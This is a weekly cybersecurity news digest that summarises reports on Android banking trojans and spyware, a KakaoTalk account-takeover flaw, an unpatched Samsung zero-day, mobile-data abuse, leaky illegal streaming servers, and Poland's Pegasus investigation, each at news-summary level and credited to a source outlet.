Weekly Cybersecurity News

This week we bring you the latest news from the world of cybersecurity. Numerous Android malware threats are in the news this week, including the New Medusa Android Trojan and the Snowblind malware which infect users’ Android devices through various means like phishing or posing as popular apps or fake updates and are a significant threat to user privacy and their finances. To know more about these threats, read the full article below.

New Medusa Android Trojan Targets Banking Users Across 7 Countries:

The Medusa Android Trojan has resurfaced with new, advanced features, targeting banking users in Canada, France, Italy, Spain, Turkey, the U.K., and the U.S. Active since July 2023, this updated malware version employs fewer permissions to evade detection but still requires access to Android's accessibility services API. It uses full-screen overlays to steal credentials and can remotely uninstall apps. Medusa spreads through phishing and dropper apps posing as fake updates, with legitimate services like Telegram used to retrieve command-and-control server information. The Trojan's reach has expanded to new regions, indicating a broader attack strategy.

Source: The Hacker News

Snowblind malware abuses Android security feature to bypass security:

Snowblind is a new Android malware that exploits the seccomp security feature to bypass anti-tampering protections in apps handling sensitive data. It repackages apps to prevent detection, intercepts system calls to evade security checks, and operates with minimal performance impact, making it difficult for users to notice. Snowblind can disable security features, read sensitive information, control devices, and exfiltrate data. Also it can be used to disable various security features in apps, such as two-factor authentication, or biometric verification. It has been observed targeting an app in Southeast Asia.

Source: Bleeping Computer

Rafel RAT Targets Android Users in Ransomware Attacks:

Rafel RAT, an open-source remote administration tool, is being widely used by cybercriminals to target Android devices for espionage and ransomware operations. This malware allows attackers to remotely control devices, steal data, manipulate device functions, encrypt files, and conduct surveillance. It primarily infiltrates through phishing campaigns, posing as legitimate apps like Instagram and WhatsApp, and requests critical permissions to maintain control. High-profile targets include military sectors in the U.S., China, and Indonesia, with a significant number of attacks on devices no longer receiving security updates. To mitigate these threats, users are advised to regularly update their devices, avoid untrusted sources, and use robust security solutions.

Source: Cyber Insider

1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution:

A critical vulnerability in KakaoTalk, a widely used Android application, has been discovered, allowing remote attackers to execute arbitrary code. This flaw, identified as CVE-2023-51219, can be exploited through the CommerceBuyActivity webview, leading to the leakage of an access token via an HTTP request header. Attackers can use this token to take over a victim’s account and read their chat messages. The exploit involves using a deep link to trigger a webview that leaks the Authorization header, which is then redirected to an attacker-controlled server using a crafted URL. This vulnerability highlights significant security risks for KakaoTalk users, especially given the lack of default end-to-end encryption and the ability to overwrite user email addresses without verification.

Source: GB Hackers

Millions Of Samsung Galaxy Users Must Wait ‘Months’ For Critical New Update:

Millions of Samsung Galaxy users are at risk due to a critical zero-day vulnerability, CVE-2024-32896, which Google recently addressed for its Pixel devices but has yet to fix for other Android devices. This vulnerability allows attackers to bypass device security features and potentially access sensitive data. Despite Google's efforts to secure Pixels, other manufacturers, including Samsung, may not receive a fix for several months, leaving their devices exposed. The issue underscores the challenges in rapidly deploying security updates across the fragmented Android ecosystem, highlighting a significant concern for users and the need for a more streamlined update process.

Source: Forbes

Hackers Using VPNs To Exploit Restrictions & Steal Mobile Data:

Hackers are exploiting loopholes in telecom provider policies to offer "free" mobile data on Telegram channels, primarily targeting users in Africa and Asia. They share configuration files to mimic zero-rated traffic, enabling users to bypass data metering. Using tools like HTTP Injector and VPNs with obfuscation techniques, attackers manipulate data packets, HTTP headers, and APN settings to disguise their data usage as legitimate traffic from zero-rated services. This abuse is facilitated through encrypted tunnels and proxies. Telecom providers can counter these tactics with multi-layered defenses such as deep packet inspection, traffic analysis, bandwidth limitations, blacklisting IP addresses, and enhancing APN security.

Source: GB Hackers

Beware Of Illegal OTT Platforms That Exposes Sensitive Personal Information:

Illegal Chinese OTT platforms have been increasingly responsible for data breaches, exposing sensitive user information, such as names and financial details, to criminal exploitation. These platforms often operate undetected, making it challenging to hold them accountable and increasing the risk of data exposure. The vulnerabilities in the HFS (HTTP File Server) software, particularly the unstable 2.3 beta version, are being exploited to leak user data. Criminal IP, a tool that searches for servers using the HFS protocol, can help identify these illegal servers. Sensitive user data is often stored in plain text files, further compromising security. These platforms also use domain fluxing to evade detection, complicating efforts to shut them down. To combat these issues, law enforcement and content providers are advised to implement network-level countermeasures like IP address blocking and traffic filtering.

Source: GB Hackers

Apple Issues New Google Chrome Warning For iPhone Users:

Apple has issued a stark warning to iPhone users about the privacy concerns associated with using Google Chrome. This follows a new advertising campaign in San Francisco, where Apple promoted Safari as "a browser that’s actually private," indirectly criticizing Chrome's data collection practices. Despite Chrome's popularity and robust features, it has faced numerous privacy issues and high-profile vulnerabilities. Apple emphasizes that Safari offers better privacy protections by default, particularly highlighting its superior private browsing mode compared to Chrome’s Incognito mode. Apple’s message is clear: iPhone users concerned about privacy should default to using Safari over Chrome.

Source: Forbes

Polish investigators seize Pegasus spyware systems as part of probe into alleged abuse:

Polish prosecutors have seized Pegasus spyware systems from a government agency as part of an investigation into allegations that the previous government used the software to spy on opposition politicians. This investigation, focusing on the period from November 2017 to December 2022, includes examining documents and securing devices from various security agencies. Testimonies from high-ranking officials, including former Deputy Prime Minister Jaros?aw Kaczyński, have been collected. Nearly 600 individuals, mostly opposition figures, were reportedly targeted. The Senate has highlighted constitutional violations, and potential criminal charges are being considered. This probe aims to bring transparency and accountability to the misuse of Pegasus in Poland.

Source: The Record